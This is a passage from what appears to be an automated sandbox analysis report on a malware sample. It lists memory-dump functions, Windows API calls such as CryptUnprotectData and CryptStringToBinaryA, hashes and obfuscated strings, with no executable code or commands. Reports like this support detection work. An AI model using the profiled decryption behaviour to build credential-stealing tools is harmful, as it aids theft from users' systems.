                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        • Opcode ID: 1e8cca4b04c9828b5b260c80903de4b743fb4738d9e426cdb5016d6343af3631
                        • Instruction ID: 8b20ab7d3fe18ebce06f07b9d3b7b1cd11f40ee385e5af39bd43a1a260fa3cda
                        • Opcode Fuzzy Hash: 1e8cca4b04c9828b5b260c80903de4b743fb4738d9e426cdb5016d6343af3631
                        • Instruction Fuzzy Hash: DB011E70600215ABDB109FA5EC85B6A7BADEF45311F108159BD0987240DE719940CB55
                        Function 00909B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00909B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00909B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00909B61
                        • LocalFree.KERNEL32 ref: 00909B70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: f37b747c7e216d2491029aff409db848ba8b7ba18457fd5ca4382c09baf3c6b9
                        • Instruction ID: e310db67ff04b86b11fd425c638fb57d5a0f1115cc3b99a853c9f2cb211c70f6
                        • Opcode Fuzzy Hash: f37b747c7e216d2491029aff409db848ba8b7ba18457fd5ca4382c09baf3c6b9
                        • Instruction Fuzzy Hash: E3F0BD703443127BE7305F65AC49F567BACEF04B61F240514FA45EA2D0DBB49880CAA4
                        Function 00CC04D9 Relevance: 5.3, Strings: 3, Instructions: 1556COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: A!V=$Qk;}$[aTG
                        • API String ID: 0-3081522449
                        • Opcode ID: 0a52a8de4a25df67afafd40993e5a2bef14d0b4816c2aeebde626b4ec751daaf
                        • Instruction ID: d017ea586ef985adfdf761ebd7d797949ba755344b97f13b3d8bc083f52f7437
                        • Opcode Fuzzy Hash: 0a52a8de4a25df67afafd40993e5a2bef14d0b4816c2aeebde626b4ec751daaf
                        • Instruction Fuzzy Hash: BBB2F7F3A082009FE304AE2DDC8567ABBE5EF94720F1A893DEAC5C3744E63558158697
                        Function 0091CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0092B110,00000000,00000001,0092B100,?), ref: 0091CB06
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0091CB46
                        • lstrcpyn.KERNEL32(?,?,00000104), ref: 0091CBC9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                        • String ID:
                        • API String ID: 1940255200-0
                        • Opcode ID: 5e7f81c1df51252dd40a337aff6b60ce3deb01ddbb990dadc93fee16155be4f6
                        • Instruction ID: f1990542eb0c11a5e0d4848206e1db410760277955ebe13dab9a8e80b212efba
                        • Opcode Fuzzy Hash: 5e7f81c1df51252dd40a337aff6b60ce3deb01ddbb990dadc93fee16155be4f6
                        • Instruction Fuzzy Hash: A3316471A40628BFD710DB94CC82FEEB7B99B88B14F104184FA14EB2D0D7B0AE44CB90
                        Function 00909B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00909B9F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00909BB3
                        • LocalFree.KERNEL32(?), ref: 00909BD7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: af5323fe49b8bbc4933342f981f2afde8ca8e4b2c1daf55c2edde42982ce7203
                        • Instruction ID: 109d6f5395b89f567ca4b7f3e2d8270b441963775e4a3cbc058e7501a995bb7d
                        • Opcode Fuzzy Hash: af5323fe49b8bbc4933342f981f2afde8ca8e4b2c1daf55c2edde42982ce7203
                        • Instruction Fuzzy Hash: BC011D75A41309AFE7109BA4DC45FAEB77CEB44B00F204554FA04AB281EBB09E00CBE1
                        Function 00CB7F7C Relevance: 4.2, Strings: 2, Instructions: 1671COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L<s$*}
                        • API String ID: 0-2654485507
                        • Opcode ID: c011291ff83f1a507d05cff288f0c4767ac9293d9c7f687c5c998c566f6b6546
                        • Instruction ID: 17fcfa6b0c22bcbdb762ffa0934ab0b49f1e4129d1c4bc02ec8a78bd99324193
                        • Opcode Fuzzy Hash: c011291ff83f1a507d05cff288f0c4767ac9293d9c7f687c5c998c566f6b6546
                        • Instruction Fuzzy Hash: 02B207F39082049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744EA3558058697
                        Function 00C38955 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ,?l~$s,2/
                        • API String ID: 0-2569158386
                        • Opcode ID: 312fa003b5ca8c0247da299036d5d220391d859ec7071b98ce5dc1d82098382c
                        • Instruction ID: 43c597da0b7d0296e39088f9e369e58026b2f712440670bfee00954f90331205
                        • Opcode Fuzzy Hash: 312fa003b5ca8c0247da299036d5d220391d859ec7071b98ce5dc1d82098382c
                        • Instruction Fuzzy Hash: 0851F7F3E092144BF3046A29EC8577AB7D6DBD4320F1A823DDE8857784ED7A5C0546C6
                        Function 00B9876E Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @\vz
                        • API String ID: 0-373495463
                        • Opcode ID: 1db3d3d411370545dab6495739658f3bbafa702603ec6d8eff68177e43e41bae
                        • Instruction ID: 1a7b15cdc9e0c24efad557b53c9904d70c275cd1ddb294e870870aaf52299412
                        • Opcode Fuzzy Hash: 1db3d3d411370545dab6495739658f3bbafa702603ec6d8eff68177e43e41bae
                        • Instruction Fuzzy Hash: AB81D0B3E083149BE3446A39DC0573BBBE5EB94720F27493DE6C8D7780EA7498418786
                        Function 00C86CCF Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G^bk
                        • API String ID: 0-3423473111
                        • Opcode ID: c8421191ffc5f5e493b8575705f45ceb821aeb0e8c469a6a8e531ecf33e26c52
                        • Instruction ID: 7917e5d4ed87a619891e8c75417863e57b65cee6e05b9a4b87e2771d215bfbe6
                        • Opcode Fuzzy Hash: c8421191ffc5f5e493b8575705f45ceb821aeb0e8c469a6a8e531ecf33e26c52
                        • Instruction Fuzzy Hash: BD5126F390C3149BE3046F29EC8663AFBE9EB94320F16463DDAC483384E97558058697
                        Function 00B9C8A1 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fa1ddb1f54229d0de3bd3165848b1d11e21c9f19eeebc822dc3a8b602fa6354
                        • Instruction ID: 9bd96d99456b72594183ca1f549bd1fa690eb9b6d1b01b9f26d5795213b62d2f
                        • Opcode Fuzzy Hash: 1fa1ddb1f54229d0de3bd3165848b1d11e21c9f19eeebc822dc3a8b602fa6354
                        • Instruction Fuzzy Hash: 02612EF3A0C3049BE7446E69EC9577ABBD9EB54324F1B053DDAC5C3780E97A14004796
                        Function 00B96C44 Relevance: .2, Instructions: 186COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ace51f6bc0bf984ee728c870f06cb0a675a868d1dd17ba8235048e019c80cfa1
                        • Instruction ID: e28849f5d386d25c857613820662bba16212198249a872556f03be9d96b3d6c8
                        • Opcode Fuzzy Hash: ace51f6bc0bf984ee728c870f06cb0a675a868d1dd17ba8235048e019c80cfa1
                        • Instruction Fuzzy Hash: C1513BF3E082049BF304193DEC49776BBDADBD5320F2B423DDA8497784E97959058242
                        Function 00D3F792 Relevance: .2, Instructions: 157COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
